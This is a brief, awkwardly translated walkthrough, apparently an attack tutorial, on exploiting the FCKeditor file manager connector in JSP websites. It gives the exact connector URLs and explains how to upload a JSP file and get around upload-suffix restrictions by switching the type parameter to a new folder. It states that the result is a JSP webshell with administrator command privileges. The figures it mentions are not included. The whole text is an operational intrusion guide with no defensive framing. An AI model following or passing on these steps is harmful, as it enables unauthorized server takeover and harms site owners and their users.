Http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector? command=fileupload&type=image¤tfolder=%2f
Use this address to find the path to upload the image, there is a loophole should return an XML file, such as the figure
Note that the red box is the place to upload the image to store the address.
and use
Http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html? Type=image&connector=connectors/jsp/connector
This address upload JSP file, if the site to upload the file suffix made restrictions, then a new name for the folder, modify the URL above type=image for type=new, the file uploaded to this folder, this folder generally will not be limited to file suffix. As shown in figure:
If all is well, the JSP Webshell obtained using this fckeditor vulnerability should have CMD Administrator privileges